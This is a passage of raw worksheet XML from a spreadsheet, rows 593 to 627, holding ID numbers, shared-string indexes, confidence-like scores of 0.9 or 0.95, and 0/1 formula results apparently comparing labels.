      <c r="L593" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O593" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="62">
        <v>15720.0</v>
      </c>
      <c r="B594" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C594" s="63" t="s">
        <v>1972</v>
      </c>
      <c r="D594" s="62" t="s">
        <v>1973</v>
      </c>
      <c r="E594" s="62" t="s">
        <v>1974</v>
      </c>
      <c r="F594" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G594" s="62">
        <v>0.95</v>
      </c>
      <c r="H594" s="64">
        <v>1.0</v>
      </c>
      <c r="I594" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J594" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K594" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L594" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O594" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="62">
        <v>15765.0</v>
      </c>
      <c r="B595" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C595" s="63" t="s">
        <v>1975</v>
      </c>
      <c r="D595" s="62" t="s">
        <v>1976</v>
      </c>
      <c r="E595" s="62" t="s">
        <v>1977</v>
      </c>
      <c r="F595" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G595" s="62">
        <v>0.95</v>
      </c>
      <c r="H595" s="64">
        <v>1.0</v>
      </c>
      <c r="I595" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J595" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K595" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L595" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O595" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="62">
        <v>15828.0</v>
      </c>
      <c r="B596" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C596" s="63" t="s">
        <v>1978</v>
      </c>
      <c r="D596" s="62" t="s">
        <v>1979</v>
      </c>
      <c r="E596" s="62" t="s">
        <v>1980</v>
      </c>
      <c r="F596" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G596" s="62">
        <v>0.95</v>
      </c>
      <c r="H596" s="64">
        <v>1.0</v>
      </c>
      <c r="I596" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J596" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K596" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L596" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O596" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="62">
        <v>15952.0</v>
      </c>
      <c r="B597" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C597" s="63" t="s">
        <v>1981</v>
      </c>
      <c r="D597" s="62" t="s">
        <v>1982</v>
      </c>
      <c r="E597" s="62" t="s">
        <v>1983</v>
      </c>
      <c r="F597" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G597" s="62">
        <v>0.95</v>
      </c>
      <c r="H597" s="64">
        <v>0.0</v>
      </c>
      <c r="I597" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J597" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K597" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L597" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O597" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="62">
        <v>16150.0</v>
      </c>
      <c r="B598" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C598" s="63" t="s">
        <v>1984</v>
      </c>
      <c r="D598" s="62" t="s">
        <v>1985</v>
      </c>
      <c r="E598" s="62" t="s">
        <v>1986</v>
      </c>
      <c r="F598" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G598" s="62">
        <v>0.95</v>
      </c>
      <c r="H598" s="64">
        <v>1.0</v>
      </c>
      <c r="I598" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J598" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K598" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L598" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O598" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="62">
        <v>16360.0</v>
      </c>
      <c r="B599" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C599" s="63" t="s">
        <v>1987</v>
      </c>
      <c r="D599" s="62" t="s">
        <v>1988</v>
      </c>
      <c r="E599" s="62" t="s">
        <v>1989</v>
      </c>
      <c r="F599" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G599" s="62">
        <v>0.9</v>
      </c>
      <c r="H599" s="64">
        <v>0.0</v>
      </c>
      <c r="I599" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J599" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K599" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L599" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O599" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="62">
        <v>16856.0</v>
      </c>
      <c r="B600" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C600" s="63" t="s">
        <v>1990</v>
      </c>
      <c r="D600" s="62" t="s">
        <v>1991</v>
      </c>
      <c r="E600" s="62" t="s">
        <v>1992</v>
      </c>
      <c r="F600" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G600" s="62">
        <v>0.95</v>
      </c>
      <c r="H600" s="64">
        <v>1.0</v>
      </c>
      <c r="I600" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J600" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K600" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L600" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O600" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="62">
        <v>16857.0</v>
      </c>
      <c r="B601" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C601" s="63" t="s">
        <v>1993</v>
      </c>
      <c r="D601" s="62" t="s">
        <v>1994</v>
      </c>
      <c r="E601" s="62" t="s">
        <v>1995</v>
      </c>
      <c r="F601" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G601" s="62">
        <v>0.9</v>
      </c>
      <c r="H601" s="64">
        <v>1.0</v>
      </c>
      <c r="I601" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J601" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K601" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L601" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O601" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="62">
        <v>16915.0</v>
      </c>
      <c r="B602" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C602" s="63" t="s">
        <v>1996</v>
      </c>
      <c r="D602" s="62" t="s">
        <v>1997</v>
      </c>
      <c r="E602" s="62" t="s">
        <v>1998</v>
      </c>
      <c r="F602" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G602" s="62">
        <v>0.9</v>
      </c>
      <c r="H602" s="64">
        <v>0.0</v>
      </c>
      <c r="I602" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J602" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K602" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L602" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O602" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="62">
        <v>17204.0</v>
      </c>
      <c r="B603" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C603" s="63" t="s">
        <v>1999</v>
      </c>
      <c r="D603" s="62" t="s">
        <v>2000</v>
      </c>
      <c r="E603" s="62" t="s">
        <v>2001</v>
      </c>
      <c r="F603" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G603" s="62">
        <v>0.9</v>
      </c>
      <c r="H603" s="64">
        <v>1.0</v>
      </c>
      <c r="I603" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J603" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K603" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L603" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O603" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="62">
        <v>17341.0</v>
      </c>
      <c r="B604" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C604" s="63" t="s">
        <v>2002</v>
      </c>
      <c r="D604" s="62" t="s">
        <v>2003</v>
      </c>
      <c r="E604" s="62" t="s">
        <v>2004</v>
      </c>
      <c r="F604" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G604" s="62">
        <v>0.95</v>
      </c>
      <c r="H604" s="64">
        <v>1.0</v>
      </c>
      <c r="I604" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J604" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K604" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L604" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O604" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="62">
        <v>17385.0</v>
      </c>
      <c r="B605" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C605" s="63" t="s">
        <v>2005</v>
      </c>
      <c r="D605" s="62" t="s">
        <v>2006</v>
      </c>
      <c r="E605" s="62" t="s">
        <v>2007</v>
      </c>
      <c r="F605" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G605" s="62">
        <v>0.95</v>
      </c>
      <c r="H605" s="64">
        <v>0.0</v>
      </c>
      <c r="I605" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J605" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K605" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L605" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O605" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="62">
        <v>17524.0</v>
      </c>
      <c r="B606" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C606" s="63" t="s">
        <v>2008</v>
      </c>
      <c r="D606" s="62" t="s">
        <v>2009</v>
      </c>
      <c r="E606" s="62" t="s">
        <v>2010</v>
      </c>
      <c r="F606" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G606" s="62">
        <v>0.95</v>
      </c>
      <c r="H606" s="64">
        <v>1.0</v>
      </c>
      <c r="I606" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J606" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K606" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L606" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O606" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="62">
        <v>17542.0</v>
      </c>
      <c r="B607" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C607" s="63" t="s">
        <v>2011</v>
      </c>
      <c r="D607" s="62" t="s">
        <v>2012</v>
      </c>
      <c r="E607" s="62" t="s">
        <v>2013</v>
      </c>
      <c r="F607" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G607" s="62">
        <v>0.95</v>
      </c>
      <c r="H607" s="64">
        <v>1.0</v>
      </c>
      <c r="I607" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J607" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K607" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L607" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O607" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="62">
        <v>17585.0</v>
      </c>
      <c r="B608" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C608" s="63" t="s">
        <v>2014</v>
      </c>
      <c r="D608" s="62" t="s">
        <v>2015</v>
      </c>
      <c r="E608" s="62" t="s">
        <v>2016</v>
      </c>
      <c r="F608" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G608" s="62">
        <v>0.95</v>
      </c>
      <c r="H608" s="64">
        <v>1.0</v>
      </c>
      <c r="I608" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J608" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K608" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L608" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O608" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="62">
        <v>17762.0</v>
      </c>
      <c r="B609" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C609" s="63" t="s">
        <v>2017</v>
      </c>
      <c r="D609" s="62" t="s">
        <v>2018</v>
      </c>
      <c r="E609" s="62" t="s">
        <v>2019</v>
      </c>
      <c r="F609" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G609" s="62">
        <v>0.95</v>
      </c>
      <c r="H609" s="64">
        <v>1.0</v>
      </c>
      <c r="I609" s="64" t="s">
        <v>2020</v>
      </c>
      <c r="J609" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K609" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L609" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O609" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="62">
        <v>17763.0</v>
      </c>
      <c r="B610" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C610" s="63" t="s">
        <v>2021</v>
      </c>
      <c r="D610" s="62" t="s">
        <v>2022</v>
      </c>
      <c r="E610" s="62" t="s">
        <v>2023</v>
      </c>
      <c r="F610" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G610" s="62">
        <v>0.95</v>
      </c>
      <c r="H610" s="64">
        <v>1.0</v>
      </c>
      <c r="I610" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J610" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K610" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L610" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O610" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="62">
        <v>17778.0</v>
      </c>
      <c r="B611" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C611" s="63" t="s">
        <v>2024</v>
      </c>
      <c r="D611" s="62" t="s">
        <v>2025</v>
      </c>
      <c r="E611" s="62" t="s">
        <v>2026</v>
      </c>
      <c r="F611" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G611" s="62">
        <v>0.95</v>
      </c>
      <c r="H611" s="64">
        <v>1.0</v>
      </c>
      <c r="I611" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J611" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K611" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L611" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O611" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="62">
        <v>17869.0</v>
      </c>
      <c r="B612" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C612" s="63" t="s">
        <v>2027</v>
      </c>
      <c r="D612" s="62" t="s">
        <v>2028</v>
      </c>
      <c r="E612" s="62" t="s">
        <v>2029</v>
      </c>
      <c r="F612" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G612" s="62">
        <v>0.95</v>
      </c>
      <c r="H612" s="64">
        <v>1.0</v>
      </c>
      <c r="I612" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J612" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K612" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L612" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O612" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="62">
        <v>18041.0</v>
      </c>
      <c r="B613" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C613" s="63" t="s">
        <v>2030</v>
      </c>
      <c r="D613" s="62" t="s">
        <v>2031</v>
      </c>
      <c r="E613" s="62" t="s">
        <v>2032</v>
      </c>
      <c r="F613" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G613" s="62">
        <v>0.9</v>
      </c>
      <c r="H613" s="64">
        <v>1.0</v>
      </c>
      <c r="I613" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J613" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K613" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L613" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O613" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="62">
        <v>18092.0</v>
      </c>
      <c r="B614" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C614" s="63" t="s">
        <v>2033</v>
      </c>
      <c r="D614" s="62" t="s">
        <v>2034</v>
      </c>
      <c r="E614" s="62" t="s">
        <v>2035</v>
      </c>
      <c r="F614" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G614" s="62">
        <v>0.95</v>
      </c>
      <c r="H614" s="64">
        <v>1.0</v>
      </c>
      <c r="I614" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J614" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K614" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L614" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O614" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="62">
        <v>18424.0</v>
      </c>
      <c r="B615" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C615" s="63" t="s">
        <v>2036</v>
      </c>
      <c r="D615" s="62" t="s">
        <v>2037</v>
      </c>
      <c r="E615" s="62" t="s">
        <v>2038</v>
      </c>
      <c r="F615" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G615" s="62">
        <v>0.95</v>
      </c>
      <c r="H615" s="64">
        <v>1.0</v>
      </c>
      <c r="I615" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J615" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K615" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L615" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O615" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="62">
        <v>18597.0</v>
      </c>
      <c r="B616" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C616" s="63" t="s">
        <v>2039</v>
      </c>
      <c r="D616" s="62" t="s">
        <v>2040</v>
      </c>
      <c r="E616" s="62" t="s">
        <v>2041</v>
      </c>
      <c r="F616" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G616" s="62">
        <v>0.95</v>
      </c>
      <c r="H616" s="64">
        <v>1.0</v>
      </c>
      <c r="I616" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J616" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K616" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L616" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O616" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="62">
        <v>18618.0</v>
      </c>
      <c r="B617" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C617" s="63" t="s">
        <v>2042</v>
      </c>
      <c r="D617" s="62" t="s">
        <v>2043</v>
      </c>
      <c r="E617" s="62" t="s">
        <v>2044</v>
      </c>
      <c r="F617" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G617" s="62">
        <v>0.9</v>
      </c>
      <c r="H617" s="64">
        <v>0.0</v>
      </c>
      <c r="I617" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J617" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K617" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L617" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O617" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="62">
        <v>18751.0</v>
      </c>
      <c r="B618" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C618" s="63" t="s">
        <v>2045</v>
      </c>
      <c r="D618" s="62" t="s">
        <v>2046</v>
      </c>
      <c r="E618" s="62" t="s">
        <v>2047</v>
      </c>
      <c r="F618" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G618" s="62">
        <v>0.95</v>
      </c>
      <c r="H618" s="64">
        <v>1.0</v>
      </c>
      <c r="I618" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J618" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K618" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L618" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O618" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="62">
        <v>18792.0</v>
      </c>
      <c r="B619" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C619" s="63" t="s">
        <v>2048</v>
      </c>
      <c r="D619" s="62" t="s">
        <v>2049</v>
      </c>
      <c r="E619" s="62" t="s">
        <v>2050</v>
      </c>
      <c r="F619" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G619" s="62">
        <v>0.9</v>
      </c>
      <c r="H619" s="64">
        <v>0.0</v>
      </c>
      <c r="I619" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J619" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K619" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L619" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O619" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="62">
        <v>19159.0</v>
      </c>
      <c r="B620" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C620" s="63" t="s">
        <v>2051</v>
      </c>
      <c r="D620" s="62" t="s">
        <v>2052</v>
      </c>
      <c r="E620" s="62" t="s">
        <v>2053</v>
      </c>
      <c r="F620" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G620" s="62">
        <v>0.9</v>
      </c>
      <c r="H620" s="64">
        <v>1.0</v>
      </c>
      <c r="I620" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J620" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K620" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L620" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O620" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="62">
        <v>19219.0</v>
      </c>
      <c r="B621" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C621" s="63" t="s">
        <v>2054</v>
      </c>
      <c r="D621" s="62" t="s">
        <v>2055</v>
      </c>
      <c r="E621" s="62" t="s">
        <v>2056</v>
      </c>
      <c r="F621" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G621" s="62">
        <v>0.9</v>
      </c>
      <c r="H621" s="64">
        <v>0.0</v>
      </c>
      <c r="I621" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J621" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K621" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L621" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O621" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="62">
        <v>19280.0</v>
      </c>
      <c r="B622" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C622" s="63" t="s">
        <v>2057</v>
      </c>
      <c r="D622" s="62" t="s">
        <v>2058</v>
      </c>
      <c r="E622" s="62" t="s">
        <v>2059</v>
      </c>
      <c r="F622" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G622" s="62">
        <v>0.9</v>
      </c>
      <c r="H622" s="64">
        <v>1.0</v>
      </c>
      <c r="I622" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J622" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K622" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L622" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O622" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="62">
        <v>19368.0</v>
      </c>
      <c r="B623" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C623" s="63" t="s">
        <v>2060</v>
      </c>
      <c r="D623" s="62" t="s">
        <v>2061</v>
      </c>
      <c r="E623" s="62" t="s">
        <v>2062</v>
      </c>
      <c r="F623" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G623" s="62">
        <v>0.95</v>
      </c>
      <c r="H623" s="64">
        <v>1.0</v>
      </c>
      <c r="I623" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J623" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K623" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L623" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O623" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="62">
        <v>20013.0</v>
      </c>
      <c r="B624" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C624" s="63" t="s">
        <v>2063</v>
      </c>
      <c r="D624" s="62" t="s">
        <v>2064</v>
      </c>
      <c r="E624" s="62" t="s">
        <v>2065</v>
      </c>
      <c r="F624" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G624" s="62">
        <v>0.95</v>
      </c>
      <c r="H624" s="64">
        <v>1.0</v>
      </c>
      <c r="I624" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J624" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K624" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L624" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O624" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="62">
        <v>20375.0</v>
      </c>
      <c r="B625" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C625" s="63" t="s">
        <v>2066</v>
      </c>
      <c r="D625" s="62" t="s">
        <v>2067</v>
      </c>
      <c r="E625" s="62" t="s">
        <v>2068</v>
      </c>
      <c r="F625" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G625" s="62">
        <v>0.95</v>
      </c>
      <c r="H625" s="64">
        <v>1.0</v>
      </c>
      <c r="I625" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J625" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K625" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L625" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O625" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="62">
        <v>20469.0</v>
      </c>
      <c r="B626" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C626" s="63" t="s">
        <v>2069</v>
      </c>
      <c r="D626" s="62" t="s">
        <v>2070</v>
      </c>
      <c r="E626" s="62" t="s">
        <v>2071</v>
      </c>
      <c r="F626" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G626" s="62">
        <v>0.9</v>
      </c>
      <c r="H626" s="64">
        <v>0.0</v>
      </c>
      <c r="I626" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J626" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K626" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L626" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O626" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="62">
        <v>20821.0</v>
      </c>
      <c r="B627" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C627" s="63" t="s">
        <v>2072</v>
      </c>
      <c r="D627" s="62" t="s">
        <v>2073</v>
      </c>
      <c r="E627" s="62" t="s">
        <v>2074</v>
      </c>
      <c r="F627" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G627" s="62">
        <v>0.9</v>
      </c>
      <c r="H627" s="64">
